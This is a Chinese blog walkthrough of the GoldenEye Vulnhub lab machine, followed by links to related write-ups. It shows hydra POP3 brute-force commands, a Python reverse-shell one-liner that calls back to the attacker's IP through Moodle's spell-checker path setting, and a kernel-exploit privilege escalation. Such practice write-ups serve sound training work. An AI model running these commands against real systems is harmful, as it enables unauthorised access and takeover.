注:因记录时间不同,记录中1.111和1.105均为靶机地址。

1信息收集

1.1得到目标,相关界面如下:

1.2简单信息收集

wappalyzer插件显示:

  web服务器:Apache 2.4.7

  OS:Ubuntu

Nmap扫描端口:

  Open port 80/25/55006/55007

1.3查看web页面更多信息

页面显示添加/sev-home/访问,于是访问http://172.16.1.111/sev-home/如下

没有用用户名密码,且页面无更多信息,尝试查看源码

发现terminal.js文件

点击查看

js文件中涉及信息如下:

  人名:Boris,Natalya

  编码:

    

html实体编码,解码后为:InvincibleHack3r

尝试使用已知两个用户名和解码后的信息登陆,发现登陆失败。Boris小写后成功登陆

登陆后的页面信息提示:

  “pop3服务配置为在一个非常高的非默认端口上运行”

结合最初nmap扫描的信息,可能为55006或55007。

识别端口:

  Nmap识别:Nmap -Pn -p your-port -sV your-IP,显示pop3端口为55007

  我是偶然加端口访问,看到相关端口信息

爆破POP3

利用已知用户名,使用工具进行爆破。这里使用hydra。

root@kali:~# hydra -l natalya -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

root@kali:~# hydra -l boris -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

PS:hydra用法:

  hydra -l muts -P pass.txt my.pop3.mail pop3

    -l 指定用户名

    -L 指定用户名字典

    -p 指定密码破解

    -P 指定密码字典

    -f 破解一个就停止

    -s 指定端口

截止目前,爆破得到的信息如下

  N:boris  P:secert1!

  N:natalya  P:bird

nc查看账户

boris账户登录:

(不知道什么原因,其他人能正常登录,我的不行。好在账户的三封邮件信息无关)

natalya账户登录:

查看第一封邮件

(好像没有有价值信息)

查看第二封邮件

从邮件进一步得到信息:

  username: xenia

  password: RCP90rulez!

  Domain: severnaya-station.com/gnocertdir

并指出需要host文件 severnaya-station.com in /etc/hosts.

按照套路,使用得到的用户名和密码登录邮箱,显示失败。转向web界面尝试。

修改本机host文件

Win10下位置(没有则新建):/windows/system32/drivers/etc

修改内容:172.16.1.105   severnaya-station.com

访问severnaya-station.com/gnocertdir

登录

到此,正式登录系统

2 漏洞发现

登陆系统,例行查看信息

发现cms类型,js库版本,编程语言等更多信息。

随处点击查看,发现 

猜想CMS为moodle,版本为2.2.3

百度搜索该CMS漏洞,发现有rce漏洞。msf搜索,发现exp。

在所有必要信息中,缺少用户名和密码。先放一放,继续查看

登录后,打开看到未读邮件,发现用户doak

继续使用工具对doak账户进行爆破

  USER doak

  PASS goat

登录doak邮箱,查看邮件

得到

  账号 dr_doak

  密码 4England!

(邮箱尝试,不存在该用户)网页登录,发现如下内容

点击文档下载查看

提到图片 /dir007key/for-007.jpg

查看http://severnaya-station.com/dir007key/for-007.jpg

网上看Linux下使用strings工具多图片进行分析

不会用,没有找到有用信息

使用exiftool,查看

或者查看图片信息

发现信息:eFdpbnRlcjE5OTV4IQ==

使用小葵解密,为xWinter1995x!

继续查看,发现如下。猜测admin为管理员账户

使用admin账户 xWinter1995x!密码登录

页面信息印证CMS版本猜想

至此,得到使用该CMS漏洞exp的所有信息

3漏洞利用

使用Msf的exp

运行失败

拿shell方法2

百度搜索,找到另一种方法

1、在Home >Site administration >Server >System paths中添加反弹shell的代码

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("本机ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2、在 Home >Site administration>Plugins > Text editors >TinyMCE HTML editor中将Spell engine改为PSpellShell

3、本地nc监听端口

4、在Home> My profile >Blogs >Add a new entry随便填点东西,然后点击下图中红框的Toggle spellchecker,之后就获得shell

获取shell之后要做的第一件事是使用Python获取一个tty

python -c 'import pty; pty.spawn("/bin/bash")'

4 权限提升

查看当前服务器版本

kali查找可用提权方式

找到kali中的文件,放到本地

Python开启服务

在nc中连接,将本机文件上传至靶机(这里改名为444.c)

因靶机中未安装gcc,故用cc编译,需将文件中一处gcc换为cc

上传>编译>修改权限>执行

到此,拿到root权限

Goldeneye 靶机过关记录的更多相关文章

  1. Vulnhub-dpwwn-01靶机过关记录

    靶机地址:172.16.1.192 Kali 目录扫描 查看info.php 端口扫描 开放3306,尝试弱密码或爆破mysql. 账户为root,密码为空,成功登陆. 查看数据库:再查看ssh表 查 ...

  2. AI-web-1靶机过关记录

    靶机地址:172.16.1.195 Kali地址:172.16.1.107 1.信息收集 端口扫描: 目录扫描: 发现robots.txt敏感文件,查看 存在/m3diNf0/,/se3reTdir7 ...

  3. Os-hackNos-1靶机过关记录

    靶机地址:172.16.1.198(或112)  kali地址:172.16.1.108 1 信息收集 靶机界面如下 简单查看 OS:Ubuntu Web:Apache2.4.18 尝试端口扫描 开放 ...

  4. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  5. GoldenEye靶机work_through暨CVE-2013-3630复现

    前言 备考OSCP,所以接下来会做一系列的OSCP向靶机来练手 靶机描述 I recently got done creating an OSCP type vulnerable machine th ...

  6. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  7. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-DC:8靶机渗透记录

    准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  9. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

随机推荐

  1. 你所不知道的 C# 中的细节

    前言 有一个东西叫做鸭子类型,所谓鸭子类型就是,只要一个东西表现得像鸭子那么就能推出这玩意就是鸭子. C# 里面其实也暗藏了很多类似鸭子类型的东西,但是很多开发者并不知道,因此也就没法好好利用这些东西 ...

  2. 解决python3使用cx_Freeze打包成exe后不能运行

    我使用的是python3.4,在使用cx_Freeze打包成exe后发现有些打包后程序能够运行,但是有些无法运行 这是控制台报错 经过多方查找发现原来是windows缺少一些python的扩展包 如下 ...

  3. 在Keras中可视化LSTM

    作者|Praneet Bomma 编译|VK 来源|https://towardsdatascience.com/visualising-lstm-activations-in-keras-b5020 ...

  4. zookeeper 负载均衡

    1,原理 将启动的服务注册到zookeeper 注册中心上面,采用临时节点,zookeeper 客户端从注册中心上读取服务的信息,之后再本地采用负载均衡算法(取模算法),将请求轮询到每个服务. 同时z ...

  5. nodejs使用express中静态资源托管(express.static())时遇到的bug

    如下:将test.html的页面挂载在服务器上, const express= require('express') const fs= require('fs') let app = express ...

  6. [vijos1145]小胖吃巧克力<概率dp>

    题目链接:https://vijos.org/p/1145 貌似还有一个一样的题是poj1322 chocolate,两个题只是描述不一样,意思都是一样的,不贵最近貌似poj炸了,所以也没法去poj ...

  7. list容器排除重复单词的程序

    #include<iostream> #include<fstream> #include<string> #include<algorithm> #i ...

  8. [斯坦福大学2014机器学习教程笔记]第五章-控制语句:for,while,if语句

    在本节中,我们将学习如何为Octave程序写控制语句. 首先,我们先学习如何使用for循环.我们将v设为一个10行1列的零向量. 接着,我们写一个for循环,让i等于1到10.写出来就是for i = ...

  9. Linux学习,Vim以及Vi常用快捷键

    VIM配置文件路径: /etc/vmrc ===> 系统配置文件路径 ~/.vimrc ===> 当前用户配置文件路径 $VIM ===> 与VIM配置文件相关的变量 进入插入模式: ...

  10. 2017蓝桥杯算式900(C++C组)

    题目:算式900 小明的作业本上有道思考题:  看下面的算式:  (□□□□-□□□□)*□□=900  其中的小方块代表0~9的数字,这10个方块刚好包含了0~9中的所有数字.  注意:0不能作为某 ...